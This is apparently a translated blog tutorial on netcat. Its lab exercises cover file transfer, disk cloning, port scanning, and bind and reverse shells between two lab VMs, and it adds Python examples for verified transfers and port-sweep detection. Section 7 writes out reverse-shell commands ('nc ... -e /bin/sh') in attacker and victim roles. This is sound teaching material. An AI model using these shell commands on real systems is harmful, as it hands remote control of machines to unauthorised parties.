
Netcat Usage Notes

I. Introduction to Netcat

**netcat** is the Swiss Army knife of networking tools: it reads and writes data across a network over TCP and UDP. Combined with other tools and with redirection, it can be used in scripts in many ways. The range of things you can accomplish with the netcat command is surprising.

All netcat does is open a connection between two machines and return two data streams; what you do after that is limited only by your imagination. You can set up a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols.

II. Common Netcat options:

OpenBSD netcat (Debian patchlevel 1.218-4ubuntu1)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
          [-m minttl] [-O length] [-P proxy_username] [-p source_port]
          [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
          [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
          [destination] [port]
Command Summary:
	-4		Use IPv4
	-6		Use IPv6
	-b		Allow broadcast
	-C		Send CRLF as line-ending
	-D		Enable the debug socket option
	-d		Detach from stdin
	-F		Pass socket fd
	-h		This help text
	-I length	TCP receive buffer length
	-i interval	Delay interval for lines sent, ports scanned
	-k		Keep inbound sockets open for multiple connects
	-l		Listen mode, for inbound connects
	-M ttl		Outgoing TTL / Hop Limit
	-m minttl	Minimum incoming TTL / Hop Limit
	-N		Shutdown the network socket after EOF on stdin
	-n		Suppress name/port resolutions
	-O length	TCP send buffer length
	-P proxyuser	Username for proxy authentication
	-p port		Specify local port for remote connects
	-q secs		quit after EOF on stdin and delay of secs
	-r		Randomize remote ports
	-S		Enable the TCP MD5 signature option
	-s sourceaddr	Local source address
	-T keyword	TOS value
	-t		Answer TELNET negotiation
	-U		Use UNIX domain socket
	-u		UDP mode
	-V rtable	Specify alternate routing table
	-v		Verbose
	-W recvlimit	Terminate after receiving a number of packets
	-w timeout	Timeout for connects and final net reads
	-X proto	Proxy protocol: "4", "5" (SOCKS) or "connect"
	-x addr[:port]	Specify proxy address and port
	-Z		DCCP mode
	-z		Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]

III. Lab exercises

Lab setup:
Server: Kali-linux-2022, 192.168.3.21
Client: Ubuntu 22.04.1 LTS, 192.168.3.22

1. Sending text messages

nc can pass messages back and forth between two machines. First one machine listens on a port, and the other connects to that port; once the connection between the two machines is established, each side can send messages to the other. The -l option means listen mode, and -p specifies the port.

Server

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234
hello?
hi? 

Client

root@ubuntu-virtual-machine:/# nc -nv 192.168.3.21 1234
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
hello?
hi?

How this message passing relates to penetration testing is that it is useful in digital forensics. After a machine has been compromised, a large amount of information and files has to be pulled off it for analysis without disturbing the scene, and this nc mechanism can do that. For example, to capture a command's output: first listen on a port on one machine, then run the relevant command on the compromised machine and pipe it into nc with the other machine's address and port, and the output lands on the other end.

2. File transfer
File transfer -> download

On the server, create log.txt under /home/kali/ to store the received file

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 > /home/kali/log.txt 

Run nc on the client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 < openme.txt

Back in /home/kali/, check log.txt

┌──(kali㉿kali)-[~]
└─$ cat log.txt   
If you see me, the file has been successfully downloaded!


File transfer -> upload

The server sends log.txt

┌──(kali㉿kali)-[~]
└─$ nc -lp 1234 < /home/kali/log.txt

The client receives it

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 > get.txt
root@ubuntu-virtual-machine:/home/ubuntu/桌面# cat get.txt
If you see me, the file has been successfully downloaded!


You can see that it has been written successfully to get.txt on the client.

With Windows as the server and Kali as the client, simply reverse the steps above; a practical example is not given here. If the server side is not yet ready to accept connections while the client has already run nc to connect, the client will keep waiting until it does connect to the server, producing an apparent hang. Solution: set a wait timeout.
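The two points just made (a listener that waits forever for a sender, and the need to know that what arrived is what was sent, which matters equally for the forensic capture in section 1) are easy to see in code. The following is an added example written for this page, not the author's own script and not part of netcat: it reproduces the nc listener/sender pair over loopback with the socket API, applies a timeout on both ends (the equivalent of nc's -w / -q flags) so neither side can hang indefinitely, and compares SHA-256 digests of the sent and received bytes. The payload is a constructed stand-in for the page's openme.txt, and the port is chosen by the OS so the example never collides with a real service.

```python
import hashlib
import socket
import threading
from typing import Optional, Tuple

# Constructed sample payload standing in for the page's openme.txt.
SAMPLE = b"If you see me, the file has been successfully downloaded!\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _read_until_eof(conn: socket.socket) -> bytes:
    chunks = []
    while True:
        chunk = conn.recv(65536)
        if not chunk:          # sender closed its write side: EOF
            break
        chunks.append(chunk)
    return b"".join(chunks)


def listen_local(timeout: float) -> Tuple[socket.socket, int]:
    """Listener side of 'nc -lp PORT'. Binds an OS-chosen loopback port and
    applies the timeout that nc's -w flag would give on the command line."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    return srv, srv.getsockname()[1]


def receive_once(srv: socket.socket, timeout: float) -> Optional[bytes]:
    """Accept one client and read until EOF. Returns None instead of
    blocking forever if nobody connects within the timeout."""
    with srv:
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            return None
        with conn:
            conn.settimeout(timeout)
            return _read_until_eof(conn)


def send_bytes(host: str, port: int, data: bytes, timeout: float) -> str:
    """Sender side of 'nc HOST PORT < file': connect with a timeout, push the
    bytes, then shut down the write side so the receiver sees EOF.
    Returns the SHA-256 of what was sent, for comparison at the far end."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        c.sendall(data)
        c.shutdown(socket.SHUT_WR)
    return sha256_hex(data)


def transfer_with_check(data: bytes, timeout: float = 5.0) -> dict:
    """Run both ends on loopback and verify the transfer end to end."""
    srv, port = listen_local(timeout)
    result: dict = {}

    def receiver() -> None:
        result["received"] = receive_once(srv, timeout)

    t = threading.Thread(target=receiver)
    t.start()
    result["sent_sha256"] = send_bytes("127.0.0.1", port, data, timeout)
    t.join()
    received = result["received"] or b""
    result["received_sha256"] = sha256_hex(received)
    result["ok"] = result["sent_sha256"] == result["received_sha256"]
    return result


def listener_gives_up(timeout: float = 0.5) -> bool:
    """The 'hang' described above, but bounded: with no client at all, the
    listener returns after the timeout instead of waiting forever."""
    srv, _ = listen_local(timeout)
    return receive_once(srv, timeout) is None


if __name__ == "__main__":
    print(transfer_with_check(SAMPLE))
    print("listener timed out cleanly:", listener_gives_up())
```

The shutdown of the write side is what makes the receiver's read loop terminate; with nc the same job is done by EOF on stdin plus -q, and forgetting it is the usual reason a transfer "never finishes". Comparing digests on both ends is also the check to run after the dd image transfer in section 5, where a truncated stream is otherwise silent.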

3. Transferring a directory

Transferring a directory is really the same as transferring text or a file: treat it as a file. Pack the directory into an archive before sending, and unpack it on the receiving machine once it arrives; that completes the directory transfer. For example, with the tar command use cvf to pack and xvf to unpack: c creates (packs) the archive, v shows the detailed progress, f gives the file name, and x extracts.

Server

┌──(kali㉿kali)-[~/Desktop]
└─$ tar cvf - ~/Desktop/ | nc -lp 1234 -q 1
tar: Removing leading `/' from member names
/home/kali/Desktop/
/home/kali/Desktop/class two/
/home/kali/Desktop/heard.txt
/home/kali/Desktop/class one/
/home/kali/Desktop/class one/first.pcapng
/home/kali/Desktop/class one/class_two.pcapng
/home/kali/Desktop/class one/class_one.pcapng

Client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -nv 192.168.3.21 1234 | tar xvf -
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
home/kali/Desktop/
home/kali/Desktop/class two/
home/kali/Desktop/heard.txt
home/kali/Desktop/class one/
home/kali/Desktop/class one/first.pcapng
home/kali/Desktop/class one/class_two.pcapng
home/kali/Desktop/class one/class_one.pcapng

4. Encrypted file transfer

Encrypted file transfer requires the mcrypt utility, which Linux does not install by default, so it has to be installed manually. After that it works like a normal file transfer: just pass the file through mcrypt for encryption as it is sent.

The options used in the command are: --flush, flush output immediately; -F, write the output to stdout; -b, do not keep the algorithm information (bare mode); -q, suppress some non-critical warnings; -d, decrypt. First listen on a port on the receiving end and wait for the other machine to connect and send the file; then, on the sending machine, encrypt the file to be sent and use nc to connect to the specified IP address and port.

Server

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > heard.txt
Enter passphrase: 

Client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# mcrypt --flush -Fbq -a rijndael-256 -m ecb < get.txt | nc -nv 192.168.3.21 1234 -q 1
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: 
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
Enter passphrase:

5. Remote disk cloning

Remote disk cloning is useful in remote digital forensics and relies on the dd command. First listen on a port with nc, then use dd to specify the partition to clone; the of parameter of dd acts as the copy side. Then, on the other machine, connect to that port with nc, where the if parameter of dd acts as the paste side. The format is as follows:

nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1

6. Creating a listening (bind) / connecting (reverse) backdoor
Listening backdoor

Server

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ncat -l -e /bin/sh -p 4444

Client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -w 10 192.168.3.21 4444
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)
        RX packets 172820  bytes 37543859 (35.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189400  bytes 52498244 (50.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 144  bytes 7472 (7.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 144  bytes 7472 (7.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Connecting backdoor

Server

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -ltvp 4444                                             
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:46990.

Client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
ifconfig
root@ubuntu-virtual-machine:/home/ubuntu/桌面# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)
        RX packets 272375  bytes 159129764 (159.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 206658  bytes 16759835 (16.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (本地环回)
        RX packets 3390  bytes 440132 (440.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3390  bytes 440132 (440.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

7. Remote control / forward and reverse shells
Forward (bind) shell

Forward shell: netcat in server mode listens for connections and hands a shell process to any client that connects. Netcat running in client mode can then connect to the server, obtain shell access to it and run commands. From a penetration-testing point of view, the server is the victim machine and the client is the attacker's machine.

Server

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 -c bash                                                  

Client

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)
        RX packets 172760  bytes 37538472 (35.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189345  bytes 52492855 (50.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 74  bytes 3740 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 74  bytes 3740 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Reverse shell

For a reverse shell, we use netcat in server mode to listen for a connection, and the shell is supplied from the client. This lets the session on the server run commands on the client once it has received the shell. From a penetration-testing point of view, the server is the attacker's machine and the client is the victim machine.

Server (attacker)

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444                                                           
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:59992.
ls
get.txt
hey.txt
home
openme.txt
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)
        RX packets 272035  bytes 159047796 (159.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 206567  bytes 16752141 (16.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (本地环回)
        RX packets 3388  bytes 439992 (439.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3388  bytes 439992 (439.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Client (victim)

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh

8. Port scanning

The nc command for port scanning is nc -nvz <ip address> <port>. The z option literally means zero I/O and is used for scanning: it merely probes, much like a ping, whether the specified port on the target is open, without any further interaction.

-n: accept only IP addresses, with no DNS resolution
-v: print detailed information about what is being done
-z: scans TCP by default; to scan UDP, add the -u option

I first started the apache2 service on the host being scanned


Check the port status on that host with netstat -ano

┌──(root㉿kali)-[/home/kali/Desktop]
└─# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 192.168.3.21:68         192.168.3.1:67          ESTABLISHED off (0.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
Active UNIX domain sockets (servers and established)

The apache2 service uses port 80 by default

root@ubuntu-virtual-machine:/# nc -nvz 192.168.3.21 70-90
nc: connect to 192.168.3.21 port 70 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 71 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 72 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 73 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 74 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused
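The sweep above is 21 connection attempts from one source to consecutive ports within a second, which is exactly the pattern a firewall log makes visible on the target. As an added example (written for this page, not the author's code), the block below builds a constructed log in a simplified netfilter LOG style, with the SRC/DST/PROTO/DPT fields real kernel lines carry, and runs a sliding-window detector over it: one alert per source that touches at least min_ports distinct TCP ports within window_s seconds. The timestamps, the gateway's benign traffic and the simplified line format are assumptions; the addresses and the 70-90 range come from the page.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Pulls the fields we need out of a netfilter-style LOG line. The constructed
# format below is simplified; real kernel lines carry more fields between them.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ kernel: .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r".*?PROTO=(?P<proto>\S+) .*?DPT=(?P<dport>\d+)"
)


def make_sample_log() -> List[str]:
    """Constructed firewall log: a little benign traffic from the gateway,
    then the 'nc -nvz 192.168.3.21 70-90' sweep from the page, which sends
    one SYN per port in quick succession."""
    base = datetime(2022, 11, 24, 20, 40, 49)
    fmt = ("{ts} kali kernel: IN=eth0 SRC={src} DST=192.168.3.21 "
           "PROTO=TCP SPT={spt} DPT={dpt} SYN")
    lines = []
    for i, port in enumerate((80, 443, 80)):
        ts = base - timedelta(minutes=5 - i)
        lines.append(fmt.format(ts=ts.isoformat(), src="192.168.3.1",
                                spt=50000 + i, dpt=port))
    for i, port in enumerate(range(70, 91)):
        ts = base + timedelta(milliseconds=40 * i)
        lines.append(fmt.format(ts=ts.isoformat(), src="192.168.3.22",
                                spt=40000 + i, dpt=port))
    return lines


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.search(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "proto": m["proto"], "dport": int(m["dport"])}


def detect_port_sweeps(lines: List[str], window_s: float = 10.0,
                       min_ports: int = 10) -> List[Dict]:
    """Alert once per source that touches >= min_ports distinct TCP ports
    within any sliding window of window_s seconds."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["proto"] == "TCP":
            by_src[ev["src"]].append(ev)
    window = timedelta(seconds=window_s)
    alerts = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        recent = deque()              # events inside the current window
        in_window = Counter()         # distinct dport -> count in window
        for ev in events:
            recent.append(ev)
            in_window[ev["dport"]] += 1
            while ev["ts"] - recent[0]["ts"] > window:
                old = recent.popleft()
                in_window[old["dport"]] -= 1
                if in_window[old["dport"]] == 0:
                    del in_window[old["dport"]]
            if len(in_window) >= min_ports:
                alerts.append({"src": src, "dst": ev["dst"],
                               "first": recent[0]["ts"], "last": ev["ts"],
                               "ports": sorted(in_window)})
                break                 # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in detect_port_sweeps(make_sample_log()):
        print(f"{a['src']} -> {a['dst']}: {len(a['ports'])} ports "
              f"between {a['first']} and {a['last']}: {a['ports']}")
```

Counting distinct destination ports rather than raw connection attempts is what separates a sweep from a chatty but legitimate client; the gateway in the sample hits only two ports and stays silent. The thresholds are starting points to tune against a site's own baseline, and the alert fires on the tenth port, before the sweep has finished.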

IV. Summary

Netcat is an excellent tool for network-related work; I have found it very useful in penetration testing, and it is truly a rare gem among network testing tools.
http://www.lryc.cn/news/2417818.html
